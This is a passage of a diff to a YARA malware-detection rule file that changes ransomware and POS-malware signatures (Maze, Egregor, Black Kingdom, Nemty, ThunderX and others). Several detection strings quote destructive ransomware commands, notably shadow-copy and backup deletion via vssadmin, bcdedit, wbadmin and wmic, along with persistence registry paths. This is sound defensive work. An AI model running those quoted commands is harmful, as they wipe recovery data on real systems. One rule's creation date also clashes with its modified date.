+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "5badaf28bde6dcf77448b919e2290f95cd8d4e709ef2d699aae21f7bae68a76c"
+		logic_hash = "fc16475fbc2a2acf5d053ded4d2ec4126c6d6dcac3a6eafadcd6c61419dd7594"
+		score = 75
+		quality = 68
+		tags = "RANSOMWARE, FILE"
+		rule_version = "v1"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Maze"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
+
+	strings:
+		$x1 = "process call create \"cmd /c start %s\"" fullword wide
+		$s1 = "%spagefile.sys" fullword wide
+		$s2 = "%sswapfile.sys" fullword wide
+		$s3 = "%shiberfil.sys" fullword wide
+		$s4 = "\\wbem\\wmic.exe" fullword wide
+		$s5 = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" fullword ascii
+		$s6 = "NO MUTEX | " fullword wide
+		$s7 = "--nomutex" fullword wide
+		$s8 = ".Logging enabled | Maze" fullword wide
+		$s9 = "DECRYPT-FILES.txt" fullword wide
+		$op0 = { 85 db 0f 85 07 ff ff ff 31 c0 44 44 44 44 5e 5f }
+		$op1 = { 66 90 89 df 39 ef 89 fb 0f 85 64 ff ff ff eb 5a }
+		$op2 = { 56 e8 34 ca ff ff 83 c4 08 55 e8 0b ca ff ff 83 }
+
+	condition:
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
+}
+rule TRELLIX_ARC_Termite_Ransomware : RANSOMWARE FILE
+{
+	meta:
+		description = "Rule to detect the Termite Ransomware"
+		author = "McAfee ATR Team"
+		id = "521ec8ee-a54c-57c3-9437-a2ef7f8ed4ca"
+		date = "2018-08-28"
+		modified = "2020-10-12"
+		reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_termite.yar#L1-L32"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "021ca4692d3a721af510f294326a31780d6f8fcd9be2046d1c2a0902a7d58133"
+		logic_hash = "e5c01e8377957fa25cf6c2031c2680e802b0082a36f50b97b4e488c5bf40e968"
+		score = 75
+		quality = 20
+		tags = "RANSOMWARE, FILE"
+		rule_version = "v1"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Termite"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
+
+	strings:
+		$s1 = "C:\\Windows\\SysNative\\mswsock.dll" fullword ascii
+		$s2 = "C:\\Windows\\SysWOW64\\mswsock.dll" fullword ascii
+		$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Termite.exe" fullword ascii
+		$s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Payment.exe" fullword ascii
+		$s5 = "C:\\Windows\\Termite.exe" fullword ascii
+		$s6 = "\\Shell\\Open\\Command\\" fullword ascii
+		$s7 = "t314.520@qq.com" fullword ascii
+		$s8 = "(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG" fullword ascii
 
 	condition:
-		12 of ( $string* )
+		( uint16( 0 ) == 0x5a4d and filesize < 6000KB ) and all of them
 }
-rule TRELLIX_ARC_Cryptolocker_Rule2 : RANSOMWARE
+
+rule TRELLIX_ARC_Ransom_Egregor : RANSOMWARE FILE
 {
 	meta:
-		description = "Detection of CryptoLocker Variants"
-		author = "Christiaan Beek, Christiaan_Beek@McAfee.com"
-		id = "a6e808ef-4f60-5592-9440-69309784efb1"
-		date = "2014-04-14"
-		modified = "2020-08-14"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Cryptolocker.yar#L42-L79"
+		description = "Detect Egregor ransomware"
+		author = "Thomas Roccia | McAfee ATR team"
+		id = "b9f1a712-c168-5e0f-8b9e-cb03a6c43fc3"
+		date = "2020-10-28"
+		modified = "2020-10-28"
+		reference = "https://bazaar.abuse.ch/sample/004a2dc3ec7b98fa7fe6ae9c23a8b051ec30bcfcd2bc387c440c07ff5180fe9a/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_egregor.yar#L4-L31"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "e8e03516cc0b669000c8d6b443be7a5f7a8b904abba98fd3c7d4f038de6741ab"
+		hash = "5f9fcbdf7ad86583eb2bbcaa5741d88a"
+		logic_hash = "8077c656eed0b1633da54f8d017d4eff122f2f4e486c4e1af6f6434ea33c0675"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
 		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Cryptolocker"
+		malware_family = "Ransom/Egregor"
 		actor_type = "Cybercrime"
-		actor_group = "Unknown"
+		actor_group = "egregor"
 
 	strings:
-		$string0 = "2.0.1.7" wide
-		$string1 = "    <security>"
-		$string2 = "Romantic"
-		$string3 = "ProductVersion" wide
-		$string4 = "9%9R9f9q9"
-		$string5 = "IDR_VERSION1" wide
-		$string6 = "button"
-		$string7 = "    </security>"
-		$string8 = "VFileInfo" wide
-		$string9 = "LookFor" wide
-		$string10 = "      </requestedPrivileges>"
-		$string11 = " uiAccess"
-		$string12 = "  <trustInfo xmlns"
-		$string13 = "last.inf"
-		$string14 = " manifestVersion"
-		$string15 = "FFFF04E3" wide
-		$string16 = "3,31363H3P3m3u3z3"
+		$p1 = "ewdk.pdb" fullword ascii
+		$p2 = "testbuild.pdb" fullword ascii
+		$s1 = "M:\\" nocase ascii
+		$s2 = "1z1M9U9" fullword wide
+		$s3 = "C:\\Logmein\\{888-8888-9999}\\Logmein.log" fullword wide
 
 	condition:
-		12 of ( $string* )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and hash.sha256 ( pe.rich_signature.clear_data ) == "b030ed1a7ca222a0923a59f321be7e55b8d0fc24c1134df1ba775bcf0994c79c" or ( pe.sections [ 4 ] . name == ".gfids" and pe.sections [ 5 ] . name == ".00cfg" ) and ( any of ( $p* ) or 2 of ( $s* ) )
 }
-rule TRELLIX_ARC_Backdoorfckg : CTB_LOCKER_RANSOMWARE RANSOMWARE
+rule TRELLIX_ARC_Ransom_Black_Kingdom : RANSOMWARE FILE
 {
 	meta:
-		description = "CTB_Locker"
-		author = "ISG"
-		id = "2a00551d-1f80-5991-9416-d9b1b39db8e9"
-		date = "2015-01-20"
-		modified = "2020-08-14"
-		reference = "https://blogs.mcafee.com/mcafee-labs/rise-backdoor-fckq-ctb-locker"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_CTBLocker.yar#L1-L26"
+		description = "Rule to detect Black Kingdom ransomware that is spread using the latest Exchange vulns"
+		author = "McAfee ATR"
+		id = "c38e6dbf-7fb9-52f0-acd0-f824647b6041"
+		date = "2025-06-01"
+		modified = "2021-04-06"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/ransom_BlackKingDom.yar#L3-L49"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "a334b07053db66aa0fb2d2b2ca7f94c480509041724ddd4dd1708052d75baffb"
-		score = 75
-		quality = 20
-		tags = "CTB_LOCKER_RANSOMWARE, RANSOMWARE"
-		rule_version = "v1"
+		logic_hash = "334e84a9469367ed64509203feb61b5f64d5a7e38d29ff5c5089631246b06588"
+		score = 50
+		quality = 68
+		tags = "RANSOMWARE, FILE"
 		malware_type = "ransomware"
-		malware_family = "Ransom:W32/CTBLocker"
+		malware_family = "Ransomware:W32/BlackKingdom_March2021"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$string0 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-		$stringl = "RNDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-		$string2 = "keme132.DLL"
-		$string3 = "klospad.pdb"
+		$0 = {7D3F634F627C5EC4D893189F1731F624A6AD458C3D89E9CB22C69EC4B4B588B1A7307D8963EC294C5B718C3D85692B8EB1A730732F8EB16F65EA5CEC17834A665E}
+		$1 = {3E774F2038FDE77377253CD11BFEB6FB82CF6A03E1B34E134C78A2CFDC1B7CD63AD167EE4E78A227FEF694EE3369143D1B0E84CF7CDAE7C3037C263DD15B979F}
+		$2 = {0C674D0A2427CDDD9B68213EC0B4A5DF94B19D39BEC0C562346FC7A1D32C0FA5BC9D963440910709A2365360650F5A909685912220EEC0F8157B3E2B95EA2CE9}
+		$3 = {7B7251266178C52BA731333F9E8A1C327A239FB81B901BAB2755FCAFD8A753F47991516A5C98A6CAAC9A1D5065DE565D87F120B3519DD91E09D353B7120EF9F2}
+		$4 = {2E233E25767037CA68F9C0F026A5CDDCC08FC0DCE21F61C612F1983A29BD3D986F8239A7692B0EBD478B6C8115564D5B0671346CF7CDDB612247EA7A4FAA7C71}
+		$5 = {2B2C3249094C8A1A9734E7515D10F78FD1B9339DF1902AC1D4ADE70C27C8A2CA7F3416B7B9F0D10E67519D589B8AD64D6435CC2DF4C2092A4BCEF7053B194AE5}
+		$6 = {0B297C7D79ECD339B30E87775B6769909CD886D1FBBAF2041DCC4FB11B5BA777AA626A9E8CAC14F64BEA5299A8E304A22BA25FA4F7AC4B95E8ACC42EC33A3DE4}
+		$7 = {0D46503D4DFD825DED41C94C055E1FCE1134C6F63AD80DCD7427F4BD502FA186077BD22653AB098C96ECDDA26557FB82BBA053CB2067C9DEA7EE0AF6A44C468A}
+		$8 = {2E774F2038FDE77277253CD11BFEB6FB82CB6A03E1B34E134C78A2CFDC1B5CD63AD167EE4E78A227FEF694EE3269143D1B0E84CF7CDAE5C3035C263DD15B979B}
+		$9 = {5C4250510A8DEF3463BF7410DEE0E72759B8A94A4D0544BD9B4FC0846E61844F4E06B779ABF906A450F5A2AC4C57CF761798C539175F092FD2429DC27909E382}
+		$10 = {7C787B386177B4D7F1F6B9E6FE17154FF15BD9E3F1DA94A1E1064654E7500A0B86A20A4AA16BD4E16F19A8733960DE868F10F382CDEEC1F15CE718839241DA10}
+		$11 = {2C3C6F6B2E597AC746FF7664087C7E899ABCC27AC60FA545D9CF4323063896D299F57132FE3E63E567EBFADF296365A1B2C0163DD8A4F3DABA04C77FA39A99CB}
+		$12 = {7B3C5D7C73D34D1A6C66B91990D162CACD89ECEAF591AC56C95AB3151EBAC1687FB749924B7BC27917FE50CA6C1417FEDBCC5BA2B7C03B1AEE4F5732E69DAC14}
+		$13 = {406357775C42584F11A1610D3A8A31F094FA252BC3E10738BD310D536D3A2F9EC5C21996AC4DCF5237AE3A4467D5678EE2983E4282ADFB1FDEA16352109BA7A7}
+		$14 = {2F265663680CACC66731B11AA78D588D7B54AC06C6348905D6B8F52C608D8208B0C6C5F1C11A2F69608D363DFA2A365AA387DAFCC906B486548F3DA8FE36312E}
+		$15 = {2B37480D634C799C468B775404368C7B891ADE3A556DF888566EB8CB3ED6F0171B59C35BB57F3B75D9017B7C9D52D1E87F48795AA58A16695B98BAFEAF66A769}
+		$16 = {0A76372D4F488ED5649A19B42E9E42B1DCC2E62655E7041711A6235B825D791CD6519492309D46964594F78B1DCAD17A5BEA574166B8A8EB76A52CA1052D724A}
+		$17 = {3D0B635F789C6CA6ADAC549548AA509C99D0C8DD823C99704423B90175B062E70EBBA67F937D622FF41B59D21E763A26D36759F3297D12B7454D82676C5B7B4A}
+		$18 = {225B642B7A09E7B06A4D3B95D97927AC46DABAE3ECE93AA4B307259DB9C01361C905B240678DB830EB7E172EB939ECB188ED3504B3709A746772B7BC94C83FB6}
+		$19 = {27465E49761EECAF449A3AB147907CF1C3D5F161D353E236BF9940AEC099EA4AC0352576803626029A15B3E978AB84D0024A1E345FFE58A81CDA2FBD61408971}
+		$20 = {3B7431210BEE4762B447DF044B5D6F41D53824C3E2CD17A35D71029352B47DA3811C60458EAADEBA532F75C54A3DDFC74AB3BEA7A51AF81A4A688F5D7A10378C}
+		$21 = {276C41453F8F2D8279980EAD3328E2478A3D84C55EB668231A12EED150E496622FCB2C04D9CBCE257BD97B9ECE404037589A185573F936A78DA88AD43EFC3948}
+		$22 = {2727495F5B1B4D920E35A52B6A5DB6A7F8B31A26873E20C53388696567D692B4B1F4A0B9267E4BBDA1728A5E883FD69029A07669AC1D0DC22E3157C028705C19}
+		$23 = {3E5552672C26C4F22824AF196F222D370F9EEDBEF119B8C3DD96414CF3529912234CB08AA7B2A034A51635319EAC44D47FA68747BA4B2FD2A884373ADEFB5C84}
+		$24 = {20735E632C6C70375BCA935EE39B7FA508205E9CC034CBD193A0D1C1E3A9A13818B9EB7FEFB11891E71221DB7143286C7D36A91C1FF7615E38F02E5C1BA24AFF}
+		$25 = {0A3D69344860D944AA8A46908019AB085E025AA693D381A34D8DCF116B25B0C62355D93893D1F64B983986C7E956C22303A9AB109680BF4B74460C5B087412AF}
+		$26 = {7C5B79652BC66C9BC36B11730D556FFA1CA1616CA59C0C344FD1F6B50C9C259329D699CDF0B894F1540AFDC4F431957206B0748AB6AE3B9069CD91147E09709B}
+		$27 = {2257442B42DB79A5E6CAD745E9A8D9775E4216C95F6094A05F05D7DAADBB03EC4B3444983DD291C2E32FC39299BCB4D22219386E75DAABB8D2EA93DFC52A248B}
+		$28 = {3C0D4A68792594D2F23F10A465B38B75D272318CA0E532A8A183F8CE5DEE6B45ECFDC96E4FF9158832472ED8CDFA69F92868A503F821D848CBB97B58332D8F84}
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
 rule TRELLIX_ARC_Ransom_Vovalex_Part2 : RANSOM FILE
 {
@@ -143093,1817 +143168,1949 @@ rule TRELLIX_ARC_Ransom_Vovalex_Part2 : RANSOM FILE
 	condition:
 		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
 }
-
-rule TRELLIX_ARC_Ransom_Tunderx : RANSOMWARE FILE
+rule TRELLIX_ARC_Nemty_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect tthe ThunderX ransomware family"
-		author = "McAfee ATR team"
-		id = "cf5ecd0c-db26-5fe4-a056-b5c1ca3b1d34"
-		date = "2020-09-14"
-		modified = "2020-10-12"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/Ransom_ThunderX.yar#L3-L45"
+		description = "Rule to detect Nemty Ransomware"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "e9b133d6-fd77-5201-995d-c42bae7cde46"
+		date = "2020-02-23"
+		modified = "2020-08-14"
+		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Nemty.yar#L1-L45"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "f870616c4a35239a01129daad5f12469b2df39251ee4bc9fbeb5523f00231ece"
+		hash = "73bf76533eb0bcc4afb5c72dcb8e7306471ae971212d05d0ff272f171b94b2d4"
+		logic_hash = "d055286670516318c14dcf4e5873b96eede5e1dfb3ee978553fc11f1ac6b3252"
 		score = 75
-		quality = 68
+		quality = 70
 		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
 		malware_type = "ransomware"
-		malware_family = "Ransomware:W32/ThunderX"
+		malware_family = "Ransom:W32/Nemty"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
-		hash1 = "7bab5dedef124803668580a59b6bf3c53cc31150d19591567397bbc131b9ccb6"
-		hash2 = "0fbfdb8340108fafaca4c5ff4d3c9f9a2296efeb9ae89fcd9210e3d4c7239666"
-		hash3 = "7527459500109b3bb48665236c5c5cb2ec71ba789867ad2b6417b38b9a46615e"
 
 	strings:
-		$pattern1 = "626364656469742E657865202F736574207B64656661756C747D20626F6F74737461747573706F6C6963792069676E6F7265616C6C6661696C75726573"
-		$s3 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550202D64656C6574654F6C64657374" ascii
-		$s4 = "626364656469742E657865202F736574207B64656661756C747D207265636F76657279656E61626C6564204E6F" ascii
-		$s5 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550" ascii
-		$s6 = "433A5C50726F6772616D2046696C65732028783836295C4D6963726F736F66742053514C20536572766572" ascii
-		$s7 = "476C6F62616C5C33353335354641352D303745392D343238422D423541352D314338384341423242343838" ascii
-		$s8 = "433A5C50726F6772616D2046696C65735C4D6963726F736F66742053514C20536572766572" ascii
-		$s9 = "76737361646D696E2E6578652044656C65746520536861646F7773202F416C6C202F5175696574" ascii
-		$s10 = "776D69632E65786520534841444F57434F5059202F6E6F696E746572616374697665" ascii
-		$s11 = "534F4654574152455C4D6963726F736F66745C45524944" ascii
-		$s12 = "AppPolicyGetProcessTerminationMethod" fullword ascii
-		$s13 = "7B5041545445524E5F49447D" ascii
-		$s14 = "726561646D652E747874" ascii
-		$s15 = "226E6574776F726B223A22" ascii
-		$s16 = "227375626964223A22" ascii
-		$s17 = "226C616E67223A22" ascii
-		$s18 = "22657874223A22" ascii
-		$s19 = "69642E6B6579" ascii
-		$s20 = "7B5549447D" ascii
-		$seq0 = { eb 34 66 0f 12 0d 10 c4 41 00 f2 0f 59 c1 ba cc }
-		$seq1 = { 6a 07 50 e8 51 ff ff ff 8d 86 d0 }
-		$seq2 = { ff 15 34 81 41 00 eb 15 83 f8 fc 75 10 8b 45 f4 }
+		$x1 = "/c vssadmin.exe delete shadows /all /quiet & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default}" fullword ascii
+		$s2 = "https://pbs.twimg.com/media/Dn4vwaRW0AY-tUu.jpg:large :D" fullword ascii
+		$s3 = "MSDOS.SYS" fullword wide
+		$s4 = "/c vssadmin.exe delete shadows /all /quiet & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} " ascii
+		$s5 = "recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete" fullword ascii
+		$s6 = "DECRYPT.txt" fullword ascii
+		$s7 = "pv3mi+NQplLqkkJpTNmji/M6mL4NGe5IHsRFJirV6HSyx8mC8goskf5lXH2d57vh52iqhhEc5maLcSrIKbukcnmUwym+In1OnvHp070=" fullword ascii
+		$s8 = "\\NEMTY-DECRYPT.txt\"" fullword ascii
+		$s9 = "rfyPvccxgVaLvW9OOY2J090Mq987N9lif/RoIDP89luS9Ouv9gUImpgCTVGWvJzrqiS8hQ5El02LdEvKcJ+7dn3DxiXSNG1PwLrY59KzGs/gUvXnYcmT6t34qfZmr8g8" ascii
+		$s10 = "IO.SYS" fullword wide
+		$s11 = "QgzjKXcD1Jh/cOLBh1OMb+rWxUbToys2ArG9laNWAWk0rNIv2dnIDpc+mSbp91E8qVN8Mv8K5jC3EBr4TB8jh5Ns/onBhPZ9rLXR7wIkaXGeTZi/4/XOtO3DFiad4+vf" ascii
+		$s12 = "NEMTY-DECRYPT.txt" fullword wide
+		$s13 = "pvXmjPQRoUmjj0g9QZ24wvEqyvcJVvFWXc0LL2XL5DWmz8me5wElh/48FHKcpbnq8C2kwQ==" fullword ascii
+		$s14 = "a/QRAGlNLvqNuONkUWCQTNfoW45DFkZVjUPn0t3tJQnHWPhJR2HWttXqYpQQIMpn" fullword ascii
+		$s15 = "KeoJrLFoTgXaTKTIr+v/ObwtC5BKtMitXq8aaDT8apz98QQvQgMbncLSJWJG+bHvaMhG" fullword ascii
+		$s16 = "pu/hj6YerUnqlUM9A8i+i/UhnvsIE+9XTYs=" fullword ascii
+		$s17 = "grQkLxaGvL0IBGGCRlJ8Q4qQP/midozZSBhFGEDpNElwvWXhba6kTH1LoX8VYNOCZTDzLe82kUD1TSAoZ/fz+8QN7pLqol5+f9QnCLB9QKOi0OmpIS1DLlngr9YH99vt" ascii
+		$s18 = "BOOTSECT.BAK" fullword wide
+		$s19 = "bbVU/9TycwPO+5MgkokSHkAbUSRTwcbYy5tmDXAU1lcF7d36BTpfvzaV5/VI6ARRt2ypsxHGlnOJQUTH6Ya//Eu0jPi/6s2MmOk67csw/msiaaxuHXDostsSCC+kolVX" ascii
+		$s20 = "puh4wXjVYWJzFN6aIgnClL4W/1/5Eg6bm5uEv6Dru0pfOvhmbF1SY3zav4RQVQTYMfZxAsaBYfJ+Gx+6gDEmKggypl1VcVXWRbxAuDIXaByh9aP4B2QvhLnJxZLe+AG5" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and pe.imphash ( ) == "ea7e408cd2a264fd13492973e97d8d70" and $pattern1 and 4 of them ) and all of ( $seq* ) or ( all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) and 4 of them ) )
 }
-rule TRELLIX_ARC_Kartoxa_Malware_Pdb : POS FILE
+rule TRELLIX_ARC_Nemty_Ransomware_2_6 : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Kartoxa POS based on the PDB"
+		description = "Rule to detect Nemty Ransomware version 2.6"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "3d2dbf22-5d8f-5f19-9048-2d021ada22c8"
-		date = "2010-10-09"
+		id = "335dff33-d078-58ba-b68b-a949895b710f"
+		date = "2020-04-06"
 		modified = "2020-08-14"
-		reference = "https://securitynews.sonicwall.com/xmlpost/guatambu-new-multi-component-infostealer-drops-kartoxa-pos-malware-apr-08-2016/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_backdoor_katorxa_pdb.yar#L1-L25"
+		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Nemty.yar#L47-L80"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "86dd21b8388f23371d680e2632d0855b442f0fa7e93cd009d6e762715ba2d054"
-		logic_hash = "6e1810af386f3aada4cd1d72f76d8210d201808c8fe1d21d379ff1a825d93710"
+		hash = "52b7d20d358d1774a360bb3897a889e14d416c3b2dff26156a506ff199c3388d"
+		logic_hash = "dacf709838ef2ef65d25bdbbd92007ab46a95953031d7bee75eac046f670171a"
 		score = 75
 		quality = 70
-		tags = "POS, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "pos"
-		malware_family = "Pos:W32/Kartoxa"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Nemty"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\vm\\devel\\dark\\mmon\\Release\\mmon.pdb"
+		$pattern = { 558B??83????53565789????29????6A??8D????8D????5A8B??89????8A????88????8B????8A????88??8A????88????8A??88????03??03??FF????75??89????8D????8D????8D????89????89????29????89????29????89????29????8D????8D????89????29????89????29????8B????89????29????8D????F6??????8B????8A????8B????8A????8A??88????8B????8A????88????75??0FB6??8A??????????0FB6??88????8A??????????0FB6????8A??????????88????0FB6????8A??????????88????8B????C1????32??????????8B????8A????32??8B????88????8A????32??88????8A??32????83????88????8B????8A????32????FF????88??83????83????83??????0F82????????5F5E5BC9C3558B??560FB6??57C1????03????6A??5F6A??5E8A??30??40414E75??4F75??5F5E5DC356576A??5F6A??8B??5E0FB6??8A??????????88??83????4E75??414F75??5F5EC38A????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????88????C3558B??5153566A??83????5E8A????32??8A????8A????88????32??32??88????88????32??8A??C0????B3??F6??02??32??32????8A????32????32??88????8A??C0????F6??02??32??32????8A????32????88????8A??C0????F6??02??32??32??8A????32????32????88??8A??C0????F6??02??32??32????83????32????4E88????75??5E5BC9C3558B??53FF????8B??32??E8????????59B3??8B??E8????????8B??E8????????8B??E8????????FF????8B??8A??E8????????FE??5980????72??8B??E8????????8B??E8????????5B8B??B0??5DE9????????558B??81??????????A1????????33??89????8B????578D??????????89??????????E8????????33??6A??5839????76??5683????75??508D????5350E8????????8D??????????508D????E8????????83????6A??5880??????75??C6??????4879??EB??FE????33??8A??????8B??????????30????47403B????72??5E8B????33??5FE8????????C9C3558B??51515333??5633??32??89????39????0F86????????578B????8B????8A????8B??83????74??4F74??4F75??21????0FB6??0FB6??83????8B??C1????C1????0B??8A??????????83????88????8A??????????8B????88??????83????EB??0FB6??0FB6??83????6A??C1????C1????5E0B??EB??33??0FB6??46C1????8A??????????88????40FF????8A??8B????3B????72??5F4E74??4E75??0FB6??83????8A????????????88????C6????????83????EB??0FB6??83????C1????8A??????????88????66????????????83????5EC6??????5BC9C3558B??33??F6??????75??5733??39????76??8B????8A????80????74??80????7C??80????7F??0FB6??8A??????????80????74??8B??83????83????74??4A74??4A74??4A75??08????40EB??8A??C0????80????08????40C0????EB??8A??C0????80????08????40C0????EB??C0????88????473B????72??EB??33??5F5DC3558B??518B??85??74??8B????568B??89????3B??74??576A??33??E8????????83????3B????75??5FFF??E8????????595E33??89??89????89????C9C3558B??80??????74??83??????72??538B??85??74??575356E8????????83????53E8????????595BC7????????????89????C6??????5DC2????C7??????????E9????????558B??568B??C7??????????E8????????F6??????74??56E8????????598B??5E5DC2????558B??83????81??????????A1????????33??89????????????5356578D????508D??????E8????????68????????8D????????????E8????????6A??5F33??83????66????????8D????8B??33??5089??????89??????E8????????E8????????33??66????????8B????????????03??????83????8D??????89??????89??????E8????????538D??????5083????8D??????E8????????538D????????????5083????E8????????8B??8D??????E8????????6A??33??E8????????83????????8B??????73??8D??????8D????????????5150FF??????????89??????83????0F84????????8B??????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????F6??????????????8D????????????508D??????8D??????74??E8????????598D??????51E8????????8B??598D??????E8????????6A??33??8D??????E8????????6A??8D??????E8????????83????8D??????8B??50E8????????E8????????83????E9????????E8????????8B??598D??????E8????????6A??33??8D??????E8????????8D????????????50FF??????????508D??????E8????????8B??????6A??5F39??????73??8D??????8B??????????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??74??8B??????39??????73??8D??????68????????50FF??85??74??83????8B??68????????E8????????83????8D????????????8B??51E8????????E8????????83????85??75??8B??????39??????73??8D??????83????8B??51E8????????E8????????83????6A??33??8D??????E8????????8D????????????50FF??????FF??????????85??0F85????????FF??????FF??????????33??435333??8D?????? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 1500KB and $pattern
 }
-rule TRELLIX_ARC_MALWARE_Blackpos_Pdb : POS FILE
+
+rule TRELLIX_ARC_Samsamransom2016 : RANSOMWARE FILE
 {
 	meta:
-		description = "BlackPOS PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "f37e1522-49c4-5369-bc2c-33b070e9eae7"
-		date = "2014-01-24"
+		description = "No description has been set in the source file - Trellix ARC"
+		author = "Christiaan Beek | McAfee ATR Team"
